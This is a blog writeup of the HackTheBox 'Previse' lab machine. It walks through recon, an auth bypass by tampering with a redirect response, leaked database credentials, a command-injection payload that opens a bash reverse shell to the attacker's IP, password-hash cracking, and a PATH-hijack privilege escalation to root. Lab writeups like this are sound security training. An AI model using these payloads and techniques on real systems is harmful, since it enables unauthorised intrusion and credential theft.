naP0

Previse Writeup - HackTheBox

Previse box from HackTheBox it's a fun, interesting box and close to the real world. For some reason I really liked this box!

Pedro Mariano

3 min

170

Welcome to the writeup of Previse box from HackTheBox. It was a fun, interesting box and close to the real world, working on curiosity to solve and get inside.

Without further ado, let's get down to business!

NMAP


          
            nmap -v -sSV -p 22,80 -Pn 10.10.11.104 -T4 -oA nmap/sSV
          
          
            
          
          
            PORT   STATE SERVICE VERSION
          
          
            22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
          
          
            80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
          
          
            Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Added 10.10.11.104 -> previse.htb to /etc/hosts.

Performed a brute-force with the Gobuster tool.

GOBUSTER


          
            gobuster dir -u previse.htb -w /opt/directory-list-lowercase-2.3-medium.txt -e -s "200,301,302,401" -x "php" -t 100
          
          
            
          
          
            http://previse.htb/login.php            (Status: 200) [Size: 2224]
          
          
            http://previse.htb/header.php           (Status: 200) [Size: 980] 
          
          
            http://previse.htb/nav.php              (Status: 200) [Size: 1248]
          
          
            http://previse.htb/download.php         (Status: 302) [Size: 0] [--> login.php]
          
          
            http://previse.htb/index.php            (Status: 302) [Size: 2801] [--> login.php]
          
          
            http://previse.htb/footer.php           (Status: 200) [Size: 217]                 
          
          
            http://previse.htb/files.php            (Status: 302) [Size: 4914] [--> login.php]
          
          
            http://previse.htb/css                  (Status: 301) [Size: 308] [--> http://previse.htb/css/]
          
          
            http://previse.htb/status.php           (Status: 302) [Size: 2968] [--> login.php]             
          
          
            http://previse.htb/js                   (Status: 301) [Size: 307] [--> http://previse.htb/js/] 
          
          
            http://previse.htb/logout.php           (Status: 302) [Size: 0] [--> login.php]                
          
          
            http://previse.htb/accounts.php         (Status: 302) [Size: 3994] [--> login.php]             
          
          
            http://previse.htb/config.php           (Status: 200) [Size: 0]                                
          
          
            http://previse.htb/logs.php             (Status: 302) [Size: 0] [--> login.php]                
          
          
            http://previse.htb/server-status        (Status: 403) [Size: 276]

I could find others pages in /nav.php source code that were not initially listed with Gobuster.


          
            /file_logs.php

Even with knowledge of existing pages we need to be authenticated to access them.

Used Burp to intercept and tamper the response to change status code from 301 to 200 "OK" and send the response. Doing that I could bypass to access the pages and create an account.

According to the permissions and informations on the page the new account ("NAP00") is apparently an "administrator" account.

With this access I was able to internally map the site and access previously identified pages that were not initially allowed, which made it possible to identify potential users.

User identified at log data: m4lwhere.

At Files > Uploaded files was possible to download siteBackup.zip and get the source code of the pages listed before.

In config.php page has the user and pass from MySQL service connection.


          
            $user = 'root';
          
          
            $passwd = 'mySQL_p@ssw0rd!:)';
          
          
            $db = 'previse';

But this information did not allow me a shell now :(

Returning to the page source code reviews searching for possible flaws was found the exec() function and it was possible to abuse it for code execution.

Used Burp to intercept the request from logs.php page and test the code execution.

Well, that worked!

Replayed the request calling the binary /bin/bash to get a reverse shell on port 6666. Awaited connection with netcat.


          
            delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.176/6666+0>%261'


          
            nc -vnlp 6666

Finally, We are inside! But our permissions are limited...

As identified before, the application makes a connection to the database using the MySQL credentials found on the config.php, using this credentials was possible to access the database successfully and m4lwhere's password hash was found.


          
            +----+--------------+------------------------------------+---------------------+
          
          
            | id | username     | password                           | created_at          |
          
          
            +----+--------------+------------------------------------+---------------------+
          
          
            |  1 | m4lwhere     | $1$🧂llol$DQpmdvnb▋▋▋▋▋▋▋▋▋ | 2021-05-27 18:18:36 |

Used hashcat to decrypt the hash with rockyou.txt wordlist.


          
            hashcat -a 0 -m 500 user /usr/share/wordlists/rockyou.txt

Used ssh to connect as m4lwhere user.


          
            ssh m4lwhere@10.10.11.104

Logged as m4lwhere was possible to get the user flag.

Privilege Escalation

Now we need to escalate our privilege and to do that we can use the command: sudo -l. Which informs sudo permission for /opt/scripts/access_backup.sh script.


          
            m4lwhere@previse:~$ sudo -l
          
          
            [sudo] password for m4lwhere: 
          
          
            User m4lwhere may run the following commands on previse:
          
          
                (root) /opt/scripts/access_backup.sh

Analyzing the /opt/scripts/access_backup.sh script, you can see that some commands/binaries are called directly and there may be the vulnerability of "path injection".

In a directory with permissions (/dev/shm) I configured the environment variable $PATH for my current directory and created the "date" file containing a netcat command to return a reverse shell on port 6699.

After that, executing the script with sudo it will run my "new" date file as root and hence the netcat command.

Received the reverse shell connection as root successfully!

Improved reverse shell with python and get root flag o/

Conclusion

Despite being classified as easy, it wasn't that "easy". The second flag (root flag) its not complex - and yet it stayed close to the real world, because many are concerned about external security, but don't "believe" in internal access (don't be like that!) - but to get the first flag (user flag), as you could see, it was a FUN job XD

For some reason I really liked this box! And I send my special thanks to "m4lwhere" - the creator of this box.

Thanks for reading and feel free to pingback a coffee ;D

naP0

Deixe seu Pingback

Learn

Support

More Options